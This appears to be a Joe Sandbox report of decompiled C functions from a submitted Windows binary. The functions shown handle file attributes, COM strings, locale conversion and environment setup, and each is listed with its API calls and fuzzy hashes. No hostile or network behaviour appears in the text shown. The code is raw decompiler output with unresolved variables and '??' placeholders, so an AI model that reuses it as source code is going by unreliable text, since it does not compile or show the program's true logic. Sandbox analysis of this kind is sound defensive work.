                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: defb69aa44ea9b6ef244ba1429e771591f6ec37fecd5fcbf61daf03dcdfbb22c
                                                                              • Instruction ID: d25d3bae2880c768a6284a6a98cce408474638340b47f4c28727e17993ccddcf
                                                                              • Opcode Fuzzy Hash: defb69aa44ea9b6ef244ba1429e771591f6ec37fecd5fcbf61daf03dcdfbb22c
                                                                              • Instruction Fuzzy Hash: D73189B0642128ABCB24DF55D880EBE7BA9EF41394F50406FF5059B252CA389DC0DB9A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00429EA9, Relevance: 6.1, APIs: 4, Instructions: 103stringtimeCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00429EA9(void* __ecx, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* _t43;
				long _t48;
				signed int* _t51;
				signed int* _t54;
				signed int* _t57;
				struct _FILETIME* _t67;
				void* _t81;
				CHAR* _t82;
				signed int* _t83;
				void* _t86;

				_t83 = _a4;
				_t81 = __ecx;
				E00412140(_t83, 0, 0x128);
				lstrcpynA( &(_t83[8]),  *(_t81 + 0xc), 0x104);
				_t43 =  *(_t81 + 4);
				_t86 = _t43 -  *0x44aa04; // 0xffffffff
				if(_t86 == 0) {
					L12:
					return 1;
				}
				_t67 =  &_v12;
				if(GetFileTime(_t43, _t67,  &_v20,  &_v28) == 0) {
					L4:
					return 0;
				}
				_t48 = GetFileSize( *(_t81 + 4), 0);
				_t83[6] = _t48;
				_t83[7] = 0;
				if(_t48 != 0xffffffff || 0 != 0) {
					_t82 =  *(_t81 + 0xc);
					if( *((intOrPtr*)(_t82 - 0xc)) != 0) {
						_t83[8] = (_t67 & 0xffffff00 | GetFileAttributesA(_t82) == 0xffffffff) - 0x00000001 & _t49;
					} else {
						_t83[8] = 0;
					}
					_t51 = E00411904( &_v36,  &_v12, 0xffffffff);
					 *_t83 =  *_t51;
					_t83[1] = _t51[1];
					_t54 = E00411904( &_v36,  &_v20, 0xffffffff);
					_t83[4] =  *_t54;
					_t83[5] = _t54[1];
					_t57 = E00411904( &_v36,  &_v28, 0xffffffff);
					_t83[2] =  *_t57;
					_t83[3] = _t57[1];
					if(( *_t83 | _t83[1]) == 0) {
						 *_t83 =  *_t57;
						_t83[1] = _t57[1];
					}
					if((_t83[4] | _t83[5]) == 0) {
						_t83[4] = _t83[2];
						_t83[5] = _t83[3];
					}
					goto L12;
				} else {
					goto L4;
				}
			}

















                                                                              0x00429eb1
                                                                              0x00429ebe
                                                                              0x00429ec0
                                                                              0x00429ed4
                                                                              0x00429eda
                                                                              0x00429edd
                                                                              0x00429ee3
                                                                              0x00429fb0
                                                                              0x00000000
                                                                              0x00429fb2
                                                                              0x00429ef1
                                                                              0x00429efe
                                                                              0x00429f19
                                                                              0x00000000
                                                                              0x00429f19
                                                                              0x00429f04
                                                                              0x00429f0d
                                                                              0x00429f10
                                                                              0x00429f13
                                                                              0x00429f20
                                                                              0x00429f26
                                                                              0x00429f3e
                                                                              0x00429f28
                                                                              0x00429f28
                                                                              0x00429f28
                                                                              0x00429f4a
                                                                              0x00429f51
                                                                              0x00429f56
                                                                              0x00429f62
                                                                              0x00429f69
                                                                              0x00429f6f
                                                                              0x00429f7b
                                                                              0x00429f82
                                                                              0x00429f88
                                                                              0x00429f90
                                                                              0x00429f94
                                                                              0x00429f99
                                                                              0x00429f99
                                                                              0x00429fa2
                                                                              0x00429fa7
                                                                              0x00429fad
                                                                              0x00429fad
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              • lstrcpynA.KERNEL32(?,?,00000104), ref: 00429ED4
                                                                              • GetFileTime.KERNEL32(?,?,?,?), ref: 00429EF6
                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 00429F04
                                                                              • GetFileAttributesA.KERNEL32(?), ref: 00429F2E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesSizeTimelstrcpyn
                                                                              • String ID:
                                                                              • API String ID: 1499663573-0
                                                                              • Opcode ID: 0113b6ad1a6e328eadc19bc36d6ba990eb9bd09bf14dc4cde13f113dc8000afa
                                                                              • Instruction ID: b3638a9b2c079d9a11e0c6508daf2b90498c7c79d710f6d215663869c41547e3
                                                                              • Opcode Fuzzy Hash: 0113b6ad1a6e328eadc19bc36d6ba990eb9bd09bf14dc4cde13f113dc8000afa
                                                                              • Instruction Fuzzy Hash: 52413CB56006149FCB24DF64D981CAAB7F8FB083107144A2EE1A6D36A0E774ED44CB54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040D649, Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 29%
                                                                              			E0040D649(void* _a4, intOrPtr _a8) {
				char _v8;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr* _t49;
				intOrPtr _t58;
				intOrPtr* _t60;
				void* _t71;

				_t71 = _a4 + 0xffffff2c;
				if( *((intOrPtr*)(_t71 + 0x84)) != 0) {
					return 0;
				}
				_t58 = _a8;
				if( *((intOrPtr*)(_t71 + 0x8c)) != 0) {
					L4:
					if( *((intOrPtr*)(_t71 + 0x98)) == _t58) {
						__imp__#9(_t71 + 0xa8);
						_t41 =  *((intOrPtr*)(_t71 + 0x4c));
						_push( &_a4);
						_push(0x44dd5c);
						_a4 = 0;
						_push(_t41);
						if( *((intOrPtr*)( *_t41))() >= 0) {
							E00412140( &_v56, 0, 0x20);
							E00412140( &_v24, 0, 0x10);
							_t47 = _a4;
							_t48 =  *((intOrPtr*)( *_t47 + 0x18))(_t47, _t58, 0x44ddcc, 0, 2,  &_v24, _t71 + 0xa8,  &_v56,  &_v8);
							_t60 = __imp__#6;
							_a8 = _t48;
							if(_v52 != 0) {
								 *_t60(_v52);
							}
							if(_v48 != 0) {
								 *_t60(_v48);
							}
							if(_v44 != 0) {
								 *_t60(_v44);
							}
							_t49 = _a4;
							 *((intOrPtr*)( *_t49 + 8))(_t49);
							if(_a8 >= 0) {
								 *((intOrPtr*)(_t71 + 0xa4)) = 1;
							}
						}
					}
					_t39 = 0;
					goto L15;
				} else {
					_v60 = 2;
					_v56 = _t58;
					_v52 = 0;
					_v48 = 0;
					_v44 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					E0040BBC8(_t71,  &_v60);
					_t39 = _v36;
					if(_t39 != 0) {
						L15:
						return _t39;
					}
					goto L4;
				}
			}





















                                                                              0x0040d654
                                                                              0x0040d662
                                                                              0x00000000
                                                                              0x0040d664
                                                                              0x0040d672
                                                                              0x0040d675
                                                                              0x0040d6a9
                                                                              0x0040d6af
                                                                              0x0040d6bc
                                                                              0x0040d6c2
                                                                              0x0040d6c8
                                                                              0x0040d6c9
                                                                              0x0040d6ce
                                                                              0x0040d6d3
                                                                              0x0040d6d8
                                                                              0x0040d6e1
                                                                              0x0040d6ed
                                                                              0x0040d6f2
                                                                              0x0040d717
                                                                              0x0040d71d
                                                                              0x0040d723
                                                                              0x0040d726
                                                                              0x0040d72b
                                                                              0x0040d72b
                                                                              0x0040d730
                                                                              0x0040d735
                                                                              0x0040d735
                                                                              0x0040d73a
                                                                              0x0040d73f
                                                                              0x0040d73f
                                                                              0x0040d741
                                                                              0x0040d747
                                                                              0x0040d74d
                                                                              0x0040d74f
                                                                              0x0040d74f
                                                                              0x0040d74d
                                                                              0x0040d6d8
                                                                              0x0040d759
                                                                              0x00000000
                                                                              0x0040d677
                                                                              0x0040d67d
                                                                              0x0040d684
                                                                              0x0040d687
                                                                              0x0040d68a
                                                                              0x0040d68d
                                                                              0x0040d690
                                                                              0x0040d693
                                                                              0x0040d696
                                                                              0x0040d699
                                                                              0x0040d69e
                                                                              0x0040d6a3
                                                                              0x0040d75b
                                                                              0x00000000
                                                                              0x0040d75b
                                                                              0x00000000
                                                                              0x0040d6a3

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: FreeString$ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 3349467263-0
                                                                              • Opcode ID: 5ae85c25e3d071020b53a15fd6199ebd0278086df464616def237aaadf58b1f3
                                                                              • Instruction ID: 6a27d367007baa36b2ebf87ec83dbd574f20471f744cd8e8dae629828e7ae737
                                                                              • Opcode Fuzzy Hash: 5ae85c25e3d071020b53a15fd6199ebd0278086df464616def237aaadf58b1f3
                                                                              • Instruction Fuzzy Hash: 53310871D10219EFCB04DFA5CC84ADEBB78BF08714F10852AF519A7290C7B4A948CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004155EC, Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 79%
                                                                              			E004155EC(void* __ecx, void* __eflags) {
				void* _t55;

				E00412ABE(__ecx, __eflags);
				 *((intOrPtr*)(_t55 - 0x1c)) = 0;
				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
				__eflags =  *(__ebp - 0x1c);
				if( *(__ebp - 0x1c) != 0) {
					L5:
					__eax = WideCharToMultiByte( *(__ebp + 0x20), __ebx,  *(__ebp + 0x10),  *(__ebp + 0x14),  *(__ebp - 0x1c),  *(__ebp - 0x20), __ebx, __ebx);
					__eflags = __eax;
					if(__eax == 0) {
						L21:
						__edi =  *(__ebp - 0x34);
						L22:
						__eflags =  *(__ebp - 0x28) - __ebx;
						if( *(__ebp - 0x28) != __ebx) {
							__eax = E00412A4D();
							__ecx = __edi;
						}
						__eflags =  *((intOrPtr*)(__ebp - 0x2c)) - __ebx;
						if( *((intOrPtr*)(__ebp - 0x2c)) != __ebx) {
							_push( *(__ebp - 0x1c));
							__eax = E00412A4D();
							_pop(__ecx);
						}
						__eax =  *(__ebp - 0x24);
						L27:
						return E00412BDF(0);
					}
					__eax = LCMapStringA( *(__ebp + 8),  *(__ebp + 0xc),  *(__ebp - 0x1c),  *(__ebp - 0x20), __ebx, __ebx);
					__esi = __eax;
					 *(__ebp - 0x30) = __esi;
					__eflags = __esi - __ebx;
					if(__esi == __ebx) {
						goto L21;
					}
					 *(__ebp - 4) = __edi;
					__eax =  &(__eax[3]);
					__eax = E00412260(__eax, __ecx);
					 *(__ebp - 0x18) = __esp;
					__edi = __esp;
					 *(__ebp - 0x34) = __edi;
					 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
					__eflags = __edi - __ebx;
					if(__edi != __ebx) {
						L11:
						__eax = LCMapStringA( *(__ebp + 8),  *(__ebp + 0xc),  *(__ebp - 0x1c),  *(__ebp - 0x20), __edi, __esi);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags =  *(__ebp + 0xd) & 0x00000004;
							if(( *(__ebp + 0xd) & 0x00000004) == 0) {
								__eflags =  *(__ebp + 0x1c) - __ebx;
								if( *(__ebp + 0x1c) != __ebx) {
									_push( *(__ebp + 0x1c));
									_push( *((intOrPtr*)(__ebp + 0x18)));
								} else {
									_push(__ebx);
									_push(__ebx);
								}
								 *(__ebp - 0x24) = MultiByteToWideChar( *(__ebp + 0x20), 1, __edi, __esi, ??, ??);
							} else {
								 *(__ebp - 0x24) = __esi;
								__eflags =  *(__ebp + 0x1c) - __ebx;
								if( *(__ebp + 0x1c) != __ebx) {
									__eflags =  *(__ebp + 0x1c) - __esi;
									if( *(__ebp + 0x1c) < __esi) {
										__esi =  *(__ebp + 0x1c);
									}
									__eax = E0041ADB0( *((intOrPtr*)(__ebp + 0x18)), __edi, __esi);
								}
							}
						}
						goto L22;
					} else {
						__edi = E00412247(__esi);
						__eflags = __edi - __ebx;
						if(__edi == __ebx) {
							goto L22;
						}
						 *(__ebp - 0x28) = 1;
						goto L11;
					}
				} else {
					__eax = E00412247( *(__ebp - 0x20));
					 *(__ebp - 0x1c) = __eax;
					__eflags = __eax;
					if(__eax == 0) {
						goto L1;
					}
					 *((intOrPtr*)(__ebp - 0x2c)) = 1;
					goto L5;
				}
				L1:
				goto L27;
			}




                                                                              0x004155ef
                                                                              0x004155f6
                                                                              0x004155f9
                                                                              0x00415600
                                                                              0x00415603
                                                                              0x00415618
                                                                              0x0041562a
                                                                              0x00415630
                                                                              0x00415632
                                                                              0x00415702
                                                                              0x00415702
                                                                              0x00415705
                                                                              0x00415705
                                                                              0x00415708
                                                                              0x0041570b
                                                                              0x00415710
                                                                              0x00415710
                                                                              0x00415711
                                                                              0x00415714
                                                                              0x00415716
                                                                              0x00415719
                                                                              0x0041571e
                                                                              0x0041571e
                                                                              0x0041571f
                                                                              0x00415722
                                                                              0x0041572a
                                                                              0x0041572a
                                                                              0x00415646
                                                                              0x0041564c
                                                                              0x0041564e
                                                                              0x00415651
                                                                              0x00415653
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415659
                                                                              0x0041565c
                                                                              0x00415662
                                                                              0x00415667
                                                                              0x0041566a
                                                                              0x0041566c
                                                                              0x0041566f
                                                                              0x0041568c
                                                                              0x0041568e
                                                                              0x004156a4
                                                                              0x004156b2
                                                                              0x004156b8
                                                                              0x004156ba
                                                                              0x004156bc
                                                                              0x004156c0
                                                                              0x004156e1
                                                                              0x004156e4
                                                                              0x004156ea
                                                                              0x004156ed
                                                                              0x004156e6
                                                                              0x004156e6
                                                                              0x004156e7
                                                                              0x004156e7
                                                                              0x004156fd
                                                                              0x004156c2
                                                                              0x004156c2
                                                                              0x004156c5
                                                                              0x004156c8
                                                                              0x004156ca
                                                                              0x004156cd
                                                                              0x004156cf
                                                                              0x004156cf
                                                                              0x004156d7
                                                                              0x004156dc
                                                                              0x004156c8
                                                                              0x004156c0
                                                                              0x00000000
                                                                              0x00415690
                                                                              0x00415697
                                                                              0x00415699
                                                                              0x0041569b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041569d
                                                                              0x00000000
                                                                              0x0041569d
                                                                              0x00415605
                                                                              0x00415608
                                                                              0x0041560e
                                                                              0x00415611
                                                                              0x00415613
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415615
                                                                              0x00000000
                                                                              0x00415615
                                                                              0x004155c5
                                                                              0x00000000

                                                                              APIs
                                                                                • Part of subcall function 00412ABE: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00412AD8
                                                                                • Part of subcall function 00412ABE: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00412AE9
                                                                                • Part of subcall function 00412ABE: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 00412B2F
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000), ref: 0041562A
                                                                              • LCMapStringA.KERNEL32(?,?,?,?,00000000,00000000), ref: 00415646
                                                                              • LCMapStringA.KERNEL32(?,?,?,?,?,00000000), ref: 004156B2
                                                                              • _strncpy.LIBCMT ref: 004156D7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: QueryStringVirtual$ByteCharInfoMultiSystemWide_strncpy
                                                                              • String ID:
                                                                              • API String ID: 1411509361-0
                                                                              • Opcode ID: 4354bf144ba335751284bb2eb5b789406234b68ace3f3828ab28ab0f93c93f63
                                                                              • Instruction ID: e32128493025af66ab0669425dedd777a8228e03adaffc0c72913b367a0b79d5
                                                                              • Opcode Fuzzy Hash: 4354bf144ba335751284bb2eb5b789406234b68ace3f3828ab28ab0f93c93f63
                                                                              • Instruction Fuzzy Hash: 4F315C72C00559EBCF119FE5DD818EE7BB5FF89314F14802AF624621A0C73949A1DF98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041F66A, Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 87%
                                                                              			E0041F66A(void* __ecx, void* __eflags) {
				short* _t40;
				intOrPtr _t42;
				int _t57;
				short* _t64;
				int _t67;
				void* _t68;
				short* _t69;

				_t58 = __ecx;
				_t69 =  *(_t68 - 0x18);
				E00412ABE(__ecx, __eflags);
				 *(_t68 - 0x34) =  *(_t68 - 0x34) & 0x00000000;
				 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
				_t57 =  *(_t68 - 0x48);
				_t40 =  *(_t68 - 0x34);
				if(_t40 != 0) {
					L4:
					if(MultiByteToWideChar( *(_t68 + 0x20), 1,  *(_t68 + 0x10),  *(_t68 + 0x14), _t40, _t57) != 0) {
						_t67 = MultiByteToWideChar( *(_t68 + 0x20), 9,  *(_t68 + 0x18),  *(_t68 + 0x1c), 0, 0);
						 *(_t68 - 0x4c) = _t67;
						if(_t67 != 0) {
							 *(_t68 - 4) = 1;
							E00412260(_t67 + _t67 + 0x00000003 & 0xfffffffc, _t58);
							 *(_t68 - 0x18) = _t69;
							_t64 = _t69;
							 *(_t68 - 0x50) = _t64;
							 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
							if(_t64 != 0) {
								L10:
								if(MultiByteToWideChar( *(_t68 + 0x20), 1,  *(_t68 + 0x18),  *(_t68 + 0x1c), _t64, _t67) != 0) {
									 *((intOrPtr*)(_t68 - 0x40)) = CompareStringW( *(_t68 + 8),  *(_t68 + 0xc),  *(_t68 - 0x34), _t57, _t64, _t67);
								}
								if( *(_t68 - 0x44) != 0) {
									_push(_t64);
									E00412A4D();
								}
							} else {
								_t64 = E00412247(_t67 + _t67);
								if(_t64 != 0) {
									 *(_t68 - 0x44) = 1;
									goto L10;
								}
							}
						}
					}
					if( *((intOrPtr*)(_t68 - 0x3c)) != 0) {
						_push( *(_t68 - 0x34));
						E00412A4D();
					}
					_t42 =  *((intOrPtr*)(_t68 - 0x40));
				} else {
					_t40 = E00412247(_t57 + _t57);
					_pop(_t58);
					 *(_t68 - 0x34) = _t40;
					if(_t40 == 0) {
						_t42 = 0;
					} else {
						 *((intOrPtr*)(_t68 - 0x3c)) = 1;
						goto L4;
					}
				}
				return E00412BDF(E00412FBB(_t42,  *((intOrPtr*)(_t68 - 0x1c))));
			}










                                                                              0x0041f66a
                                                                              0x0041f66a
                                                                              0x0041f66d
                                                                              0x0041f672
                                                                              0x0041f676
                                                                              0x0041f67a
                                                                              0x0041f682
                                                                              0x0041f687
                                                                              0x0041f6a1
                                                                              0x0041f6b5
                                                                              0x0041f6d0
                                                                              0x0041f6d2
                                                                              0x0041f6d7
                                                                              0x0041f6dd
                                                                              0x0041f6ed
                                                                              0x0041f6f2
                                                                              0x0041f6f5
                                                                              0x0041f6f7
                                                                              0x0041f6fa
                                                                              0x0041f71a
                                                                              0x0041f733
                                                                              0x0041f748
                                                                              0x0041f75c
                                                                              0x0041f75c
                                                                              0x0041f763
                                                                              0x0041f765
                                                                              0x0041f766
                                                                              0x0041f76b
                                                                              0x0041f71c
                                                                              0x0041f726
                                                                              0x0041f72a
                                                                              0x0041f72c
                                                                              0x00000000
                                                                              0x0041f72c
                                                                              0x0041f72a
                                                                              0x0041f71a
                                                                              0x0041f6d7
                                                                              0x0041f770
                                                                              0x0041f772
                                                                              0x0041f775
                                                                              0x0041f77a
                                                                              0x0041f77b
                                                                              0x0041f689
                                                                              0x0041f68d
                                                                              0x0041f692
                                                                              0x0041f693
                                                                              0x0041f698
                                                                              0x0041f7b0
                                                                              0x0041f69e
                                                                              0x0041f69e
                                                                              0x00000000
                                                                              0x0041f69e
                                                                              0x0041f698
                                                                              0x0041f841

                                                                              APIs
                                                                                • Part of subcall function 00412ABE: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00412AD8
                                                                                • Part of subcall function 00412ABE: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00412AE9
                                                                                • Part of subcall function 00412ABE: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 00412B2F
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,0041D89C,00000000,00000000,00000000,00000000,00000000,00000000,0041A597,0044CC0C), ref: 0041F6AD
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,0041188E,00000000,00000000,?,0041D89C,00000000,00000000,00000000,00000000,00000000,00000000,0041A597,0044CC0C), ref: 0041F6CA
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,0041188E,?,00000000,?,0041D89C,00000000,00000000,00000000,00000000,00000000,00000000,0041A597,0044CC0C), ref: 0041F740
                                                                              • CompareStringW.KERNEL32(?,?,00000190,00000000,?,00000000,?,00000000,?,0041D89C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041F756
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$QueryVirtual$CompareInfoStringSystem
                                                                              • String ID:
                                                                              • API String ID: 1997773198-0
                                                                              • Opcode ID: e4dac6fd1e1db323bef1e37bec62b7fef285bbc2a59e921a58e49f5016fa505d
                                                                              • Instruction ID: 2df65f9f423b14ef46bf1b1cc5de3305eadf03fa0e2f559cb83695ed31fa3782
                                                                              • Opcode Fuzzy Hash: e4dac6fd1e1db323bef1e37bec62b7fef285bbc2a59e921a58e49f5016fa505d
                                                                              • Instruction Fuzzy Hash: 30318F31801618EBDF219FA0DE45BDE7F75EF04714F20012AF924A62A0C77889A6CB84
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00417502, Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 94%
                                                                              			E00417502() {
				void* __ebp;
				signed int _t5;
				intOrPtr _t6;
				signed int _t11;
				void* _t12;
				signed int _t13;
				signed int _t24;
				signed int _t25;
				intOrPtr* _t26;
				char* _t27;
				void* _t30;
				intOrPtr _t32;

				_t32 =  *0x45be8c; // 0x1
				if(_t32 == 0) {
					_t5 = E00413A27();
				}
				_t26 =  *0x45a3e0; // 0x0
				_t24 = 0;
				if(_t26 != 0) {
					while(1) {
						_t6 =  *_t26;
						if(_t6 == 0) {
							break;
						}
						if(_t6 != 0x3d) {
							_t24 = _t24 + 1;
						}
						_t26 = _t26 + E00411A30(_t26) + 1;
					}
					_t5 = E00412247(4 + _t24 * 4);
					_t25 = _t5;
					 *0x45a410 = _t25;
					if(_t25 != 0) {
						_t27 =  *0x45a3e0; // 0x0
						while( *_t27 != 0) {
							_t30 = E00411A30(_t27) + 1;
							if( *_t27 == 0x3d) {
								L14:
								_t27 = _t27 + _t30;
								continue;
							}
							_t12 = E00412247(_t30);
							 *_t25 = _t12;
							if(_t12 == 0) {
								_push( *0x45a410);
								_t13 = E00412A4D();
								 *0x45a410 = 0;
								_t11 = _t13 | 0xffffffff;
								L17:
								return _t11;
							}
							E00419460(_t12, _t27);
							_t25 = _t25 + 4;
							goto L14;
						}
						_push( *0x45a3e0);
						E00412A4D();
						 *0x45a3e0 = 0;
						 *_t25 = 0;
						 *0x45be80 = 1;
						_t11 = 0;
						goto L17;
					}
					goto L9;
				} else {
					L9:
					return _t5 | 0xffffffff;
				}
			}















                                                                              0x00417505
                                                                              0x0041750d
                                                                              0x0041750f
                                                                              0x0041750f
                                                                              0x00417514
                                                                              0x0041751a
                                                                              0x0041751e
                                                                              0x00417532
                                                                              0x00417532
                                                                              0x00417536
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417524
                                                                              0x00417526
                                                                              0x00417526
                                                                              0x0041752e
                                                                              0x0041752e
                                                                              0x00417540
                                                                              0x00417545
                                                                              0x0041754a
                                                                              0x00417550
                                                                              0x00417557
                                                                              0x0041758a
                                                                              0x00417568
                                                                              0x0041756d
                                                                              0x00417588
                                                                              0x00417588
                                                                              0x00000000
                                                                              0x00417588
                                                                              0x00417570
                                                                              0x00417578
                                                                              0x0041757a
                                                                              0x004175b3
                                                                              0x004175b9
                                                                              0x004175be
                                                                              0x004175c4
                                                                              0x004175ad
                                                                              0x00000000
                                                                              0x004175ae
                                                                              0x0041757e
                                                                              0x00417585
                                                                              0x00000000
                                                                              0x00417585
                                                                              0x0041758e
                                                                              0x00417594
                                                                              0x00417599
                                                                              0x0041759f
                                                                              0x004175a1
                                                                              0x004175ab
                                                                              0x00000000
                                                                              0x004175ab
                                                                              0x00000000
                                                                              0x00417520
                                                                              0x00417552
                                                                              0x00000000
                                                                              0x00417552

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: _strlen$___initmbctable_strcat
                                                                              • String ID:
                                                                              • API String ID: 109824703-0
                                                                              • Opcode ID: 9a27cef034060f0b8fc8fab9bb8f45732d89598e3fa73e993d896ec4d4ffa2d2
                                                                              • Instruction ID: e4378317086149e0ba5dc4709b9ab4935a166bb8b379aec355851efaa0c11858
                                                                              • Opcode Fuzzy Hash: 9a27cef034060f0b8fc8fab9bb8f45732d89598e3fa73e993d896ec4d4ffa2d2
                                                                              • Instruction Fuzzy Hash: BD11667204D610AAC7206F21AC445E63BA6FB023A9324073FF191836A2DB3D98D1C78D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040D29E, Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 81%
                                                                              			E0040D29E(void* __edi) {
				intOrPtr _t35;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t50;
				signed int _t60;
				void* _t63;

				E004128A0(E0043114F, _t63);
				_t60 = 0;
				 *((intOrPtr*)(_t63 - 0x10)) = 0;
				 *((intOrPtr*)(_t63 - 0x14)) = 0x44ada0;
				_t48 =  *((intOrPtr*)(_t63 + 8));
				 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = 0;
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t48 - 8)) == 0) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t48 - 0xac)) + 0x1c)) + 0x1c)));
